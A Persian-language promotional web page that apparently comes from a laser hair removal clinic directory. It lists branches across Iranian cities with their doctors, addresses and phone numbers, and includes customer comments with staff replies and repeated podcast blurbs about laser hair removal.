در این مرکز خدمات لیزر موهای زائد با دستگاه دایود با تکنولوژی سوپرانو ،خدمات تزریق بوتاکس وژل  و همچنین خدمات جوانسازی پوست صورت و بدن ارائه می شود.

این شعبه زیر نظر دکتر محمد علی زکی زاده می باشد. (برای دیدن لیست قیمت های لیزر موهای زائد در اهواز اینجا کلیک کنید)

نشانی مرکز شماره 4:

اهواز،سپيدار، سه راهي باهنر، جنب داروخانه دكتر قبله شناس، مطب دكتر زكى زاده

شماره های تماس (صبح ها 9 الی 13 و عصرها 17 الی 21)

خانم زمانى: 91692472

ساير شماره ها:

61-329188

6132277


رشت

در این مرکز، خدمات لیزر با دستگاه لیزر موهای زائد الکس دایود پلاتینیوم ارائه می شود.

این مطب زیر نظر خانم دکتر معصومه امامی سیکارودی می باشد.

(برای دیدن لیست قیمت های لیزر موهای زائد در شهر رشت اینجا کلیک کنید)

دکتر معصومه امامی سیگارودی

عضو انجمن لیزر ایران

فارغ التحصیل رشته پوست،مو و زیبایی از دانشگاه YSMU

نشانی مرکز تخصصی رشت: رشت،گلسار،نبش خیابان 86،برج کاوه،بلوک 2 ، طبقه 5

شماره های تماس (شنبه-پنجشنبه از 9 صبح الی 7 بعدازظهر):

1333111257

شیراز

در این مطب خدمات لیزر با دستگاه لیزر موهای زائد پلاتینیوم (الکس دایود) ارائه می شود.

این مطب زیر نظر خانم دکتر شایسته حاجیان می باشد.

برای دیدن لیست قیمت های لیزر موهای زائد در شهر شیراز اینجا کلیک کنید.

دکتر شایسته حاجیان

دارای مدرک پوست و زیبایی از پاریس

نشانی مرکز تخصصی شیراز: شیراز-خیابان قصر دشت -نرسیده به چهارراه زرگری-نبش کوچه 54-ساختمان گلبرگ -طبقه چهارم-واحد43

شماره های تماس (شنبه-پنجشنبه از 9 صبح الی 1:3 و بعدازظهر ها ساعت 4:3 الی 9شب):

71362881

713628782

933718359

مرکز تخصصی لیزر موهای زائد بوشهر 

به زودی شعبه جدید افتتاح می شود !

در این مطب خدمات لیزر با دستگاه لیزر موهای زائد دایود با تکنولوژی الکس دایود (پلاتینیوم ) ارائه می شود. این مطب زیر نظر (شعبه جدید به زودی افتتاح می شود )می باشد.

برای دیدن لیست قیمت های لیزر موهای زائد در شهر بوشهر  اینجا کلیک کنید.

 مرکز تخصصی زنجان: شعبه قبلی جابجا شده و به زودی شعبه جدید فعال می شود 

در این مطب خدمات لیزر با دستگاه الکساندرایت/ان-دی-یاگ کلاریتی دارای FDA آمریکا مدل 216 ،خدمات تزریق بوتاکس وژل، رفع تتو ،درمان بیماری های پوستی و همچنین خدمات جوانسازی پوست صورت و بدن با تکنولوژی پیشرفته  ارائه می شود. این مطب به زودی فعال میشود .

همدان

مطب تخصصی لیزر موهای زائد همدان: به زودی شعبه جدید فعال می شود 

در حال حاضر مجموعه تهران اسکین در همدان شعبه ای ندارد. 

بابل

سنندج

در این مطب خدمات لیزر با دستگاه اختصاصی لیزر الکساندریت/ان دی یاگ ارائه می شود. این مطب زیر نظر دکتر غزال آقایی می باشد.

برای دیدن لیست قیمت ها و سایر اطلاعات در مورد انواع دستگاههای مورد استفاده اینجا کلیک کنید.

شماره های تماس و

87335611 و 9188788242
سنندج، انتهای خیابان تعریف (تاج)، بالاتر از شهید قاضی، ساختمان پزشکان امانیه، طبقه 3، واحد 4 

ساعت کار روزانه از 1 صبح تا 8 عصر

کرج

در این مطب خدمات لیزر موهای زائد با دستگاه اختصاصی لیزر دایود با تکنولوژی سوپرانو آمریکا ارائه می شود. این مطب زیر نظر دکتر محمد علی کریمیان میباشد.

برای مشاهده لیست قیمت ها و سایر اطلاعات در مورد انواع دستگاههای مورد استفاده اینجا کلیک کنید.

دکتر محمد علی کریمیان

شماره های تماس و

34324713
958194126933574236

کرمان بلوارجهاد کوچه جهاد شش، طبقه بالای عینک مجلل

در این مطب خدمات لیزر موهای زائد با دستگاه اختصاصی لیزر دایود با تکنولوژی سوپرانو آمریکا ارائه می شود. این مطب زیر نظر دکتر سعید ثوابی نسب متخصص پوست و مو میباشد.

برای مشاهده لیست قیمت ها و سایر اطلاعات در مورد انواع دستگاههای مورد استفاده اینجا کلیک کنید.

دکتر سعید ثوابی نسب

شماره های تماس و

35-37264114
یزد -بلوار طالقانی-کوچه مجاهد- ساختمان پزشکان حکیم -طبقه دوم

با عرض سلام.مگه قیمتها توی مطب تغییر میکنه.من در شعبه اصفهان رفتم زیر بغل در سایت ۵۰ هزار تومان بود در مطب از من۵۵ گرفتن.ایا این کارشون درسته؟

قیمت های درج گردیده کاملا صحیح و پایه قیمت ها می باشد. این قیمت برای سال گذشته بوده است و قیمت حال حاضر 55 هزارتومان می باشد. هم چنین گاهی اوقات تراکم موهای برخی افراد زیاد تر می باشد و یا جثه فردی نسبت به استاندارد مراکز بزرگتر است. در این صورت قیمت نهایی در این موارد کمی از قیمت های درج گردیده، محاسبه می گردد.
از توجه و دیدگاهتان سپاسگزاریم.

سلام
من می خواستم از شعبه کرج وقت بگیرم ولی متاسفانه شعبه کرج اصلا به تلفن جواب نمی دهند. آیا شماره تغییر کرده؟

گاهی اوقات خط مرکز دچار مشکل می شود لطفا مجددا تماس بگیرید. خط ها تغییر نکرده اند.

ارومیه
یا شهرهای اذربایجان غربی نمایندگی ندارین
برای آقایون

در حال حاضر شعبه ی فعالی در این منطقه نداریم. در سایت اطلاع رسانی خواهد شد.

اپراتور آقا وبا سابقه لازم داشتین در خدمت هستم وعلاقه دارم تا به صورت درصدی ونفری کار کنم تا به صورت حقوق ماهیانه والان هم با ۲ مرکز در ارتباط هستم


سپاسگزاریم

با سلام از کجا میتونیم از نوع دستگاه لیزری که تو مطب ها استفاده میشن مطمین بشیم؟

دستگاه های معتبر در سایت اطلاع رسانی شده است.
برند دستگاه، ساخت تولید و مشخصات اصلی در پشت دستگاه درج گردیده است.

چرا کرجو باز نمیکنه ، میشه آدرس و شماره تلفن بدین . ممنون

در حال حاضر شعبه ی فعالی در کرج نداریم. میتوانید به مرکز شماره یک تهران مراجعه فرمایید.

https://www.tehranskin.com/%D9%85%D8%B9%D8%B1%D9%81%DB%8C-%D8%A8%D9%87%D8%AA%D8%B1%DB%8C%D9%86-%D9%85%D8%B1%DA%A9%D8%B2-%D9%84%DB%8C%D8%B2%D8%B1-%D9%85%D9%88%D9%87%D8%A7%DB%8C-%D8%B4%D8%B1%DB%8C%D8%B9%D8%AA%DB%8C-%D8%AF%D9%88/

سلام . بندرعباس هم کلینیک دارین

در حال حاضر خیر.
شعبه اهواز فعال می باشد.

تخفیف ویژه لیزر به مناسبت عید نوروز، با جدیدترین تکنولوژی روز دنیا (اسکلپیون 218 Mediostar)
بی دردترین و بهداشتی ترین دستگاه لیزر در ایران

مهم نیست که در کدام شهر هستید و چقدر میخواهید خرج زیباییتان کنید!
همیشه بهترین مراکز لیزر موهای زائد را در این سایت ببینید.

لیزر موهای زائد گونه از طریق تاباندن اشعه ی لیزر بر سطح پوست صورت می گیرد. فرآیند لیزر در حقیقت به معنی استفاده از اشعه ی کنترل شده ی لیزر برای سوزاندن ریشه مو است. طول موج و برد این اشعه ی مخرب در دستگاه لیزر به شدت کنترل می شود تا هرگز نتواند به

https://anchor.fm/s/852dd9/podcast/play/2532878/https://d3ctxlq1ktw2nl.cloudfront.net/staging/219-2-2/——————————-f2143751fafcc.m4a

وقتی حرف از موهای زائد به میان می آید مردم اغلب یاد زیر بغل و موهای زائد ناحیه تناسلی می افتند. یا موهای زائد دست و پا و سینه و کمر. اما در حقیقت موهای گونه هم جزو موهای زائد به حساب می آیند. در کل برای خانم ها هرگونه مو روی صورت جزو موهای

https://anchor.fm/s/852dd9/podcast/play/25326/https://d3ctxlq1ktw2nl.cloudfront.net/staging/219-2-2/——————————-8a56a134e6231.m4a

آیا شما هم از موهای ضخیم زائد بدنتان خسته شده اید؟ آیا شما هم دیگر نمی خواهید وقت و انرژی خود را صرف شیو کردن مداوم موهای زائد بدنتان بکنید؟ آیا شما هم از درد و هزینه ی اپیلاسیون خسته شده اید؟ پس حتما اسم لیزر موهای زائد به گوشتان خورده است. همانطور که احتمالا

https://anchor.fm/s/852dd9/podcast/play/253218/https://d3ctxlq1ktw2nl.cloudfront.net/staging/219-2-2/——————————-ab51f35559ea.m4a

دستگاه های لیزر اسكلپيون مديو استار ٢٠١٨ سریعترین دستگاه ها برای از بین بردن موهای زائد می باشند. این روش برای درمان سریع بخش های وسیع بدن موثر است. به علاوه روش ليزر اسكلپيون ٢٠١٨ برای افراد دارای پوست روشن یا سبزه روش بسیار موثری است. لیزر اسكلپيون یکی از روش هایی است که اغلب

https://anchor.fm/s/852dd9/podcast/play/253187/https://d3ctxlq1ktw2nl.cloudfront.net/staging/219-2-2/——————————-ed98bc342872.m4a

لیزر موهای زائد فرایندی است که از انرژی لیزر برای نفوذ به عمق فولیکول های مو استفاده می کند. نتیجه استفاده از این فن آوری کاهش چشمگیر موها و یا حتی از بین رفتن دائم موها می باشد. گرچه معمولا در هنگام لیزر درمانی درد کمی در محل های استفاده از لیزر بروز می کند،

https://anchor.fm/s/852dd9/podcast/play/2531792/https://d3ctxlq1ktw2nl.cloudfront.net/staging/219-2-2/——————————-58a4e37277b.m4a

سایت فوق تخصصی بهترین مراکز لیزر موهای زائد، پوست و زیبایی در کشور و تنها مرجع مستقیم پوست و مو در کشور که توسط چندین متخصص پوست و مو اداره میشود
__________________________________
مطب تخصصی شماره 1 (تهران) دارای بیشترین تخفیف لیزر مو در کشور
نشانی و شماره های تماس:
خ شریعتی،بالاتر از مترو قلهک،روبروی خ دولت،کوچه امامزاده،جنب فروشگاه جانبو،پلاک 14، طبقه 1،واحد1
2261218_21
22612171_21
92761748
*********************************************
مطب تخصصی اصفهان: زیر نظر دکتر مهسا سعیدیان
نشانی و شماره های تماس:
اصفهان،دروازه شيراز ، چهارباغ بالا ، كوچه مسجدالرضا(قبل شركت زمزم)، ساختمان 99، طبقه 1 واحد13
913498783 – 36639913
*********************************************
مرکز تخصصی شیراز

شیراز-خیابان قصر دشت -نرسیده به چهارراه زرگری-نبش کوچه 54-ساختمان گلبرگ -طبقه چهارم-واحد43

شماره های تماس (شنبه-پنجشنبه از 9 صبح الی 1:3 و بعدازظهر ها ساعت 4:3 الی 9شب):

71362881 – 713628782

*********************************************
مرکز تخصصی مشهد
مشهد، احمد آباد،خیابان عرف، عارف 3، پلاک 26
شماره های تماس ( شنبه تا پنجشنبه از 1 صبح الی 8 شب)

شماره های تماس:
915784617
38463883 (51)
*********************************************

همه شعب در این نوشته نیست، برای دیدن نشانی و اطلاعات بقیه شعب تهران و شهرستانها، اینجا کلیک کنید

سایت تهران اسکین

بزرگترین سایت معرفی بهترین مراکز لیزر موهای زائد در کشور

لیزر موهای زائد گونه از طریق تاباندن اشعه ی لیزر بر سطح پوست صورت می گیرد. فرآیند لیزر در حقیقت به معنی استفاده از اشعه ی کنترل شده ی لیزر برای سوزاندن ریشه مو است. طول موج و برد این اشعه ی مخرب در دستگاه لیزر به شدت کنترل می شود تا هرگز نتواند به

https://anchor.fm/s/852dd9/podcast/play/2532878/https://d3ctxlq1ktw2nl.cloudfront.net/staging/219-2-2/——————————-f2143751fafcc.m4a

وقتی حرف از موهای زائد به میان می آید مردم اغلب یاد زیر بغل و موهای زائد ناحیه تناسلی می افتند. یا موهای زائد دست و پا و سینه و کمر. اما در حقیقت موهای گونه هم جزو موهای زائد به حساب می آیند. در کل برای خانم ها هرگونه مو روی صورت جزو موهای

https://anchor.fm/s/852dd9/podcast/play/25326/https://d3ctxlq1ktw2nl.cloudfront.net/staging/219-2-2/——————————-8a56a134e6231.m4a

آیا شما هم از موهای ضخیم زائد بدنتان خسته شده اید؟ آیا شما هم دیگر نمی خواهید وقت و انرژی خود را صرف شیو کردن مداوم موهای زائد بدنتان بکنید؟ آیا شما هم از درد و هزینه ی اپیلاسیون خسته شده اید؟ پس حتما اسم لیزر موهای زائد به گوشتان خورده است. همانطور که احتمالا

https://anchor.fm/s/852dd9/podcast/play/253218/https://d3ctxlq1ktw2nl.cloudfront.net/staging/219-2-2/——————————-ab51f35559ea.m4a

دستگاه های لیزر اسكلپيون مديو استار ٢٠١٨ سریعترین دستگاه ها برای از بین بردن موهای زائد می باشند. این روش برای درمان سریع بخش های وسیع بدن موثر است. به علاوه روش ليزر اسكلپيون ٢٠١٨ برای افراد دارای پوست روشن یا سبزه روش بسیار موثری است. لیزر اسكلپيون یکی از روش هایی است که اغلب

https://anchor.fm/s/852dd9/podcast/play/253187/https://d3ctxlq1ktw2nl.cloudfront.net/staging/219-2-2/——————————-ed98bc342872.m4a

لیزر موهای زائد فرایندی است که از انرژی لیزر برای نفوذ به عمق فولیکول های مو استفاده می کند. نتیجه استفاده از این فن آوری کاهش چشمگیر موها و یا حتی از بین رفتن دائم موها می باشد. گرچه معمولا در هنگام لیزر درمانی درد کمی در محل های استفاده از لیزر بروز می کند،

https://anchor.fm/s/852dd9/podcast/play/2531792/https://d3ctxlq1ktw2nl.cloudfront.net/staging/219-2-2/——————————-58a4e37277b.m4a

9

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *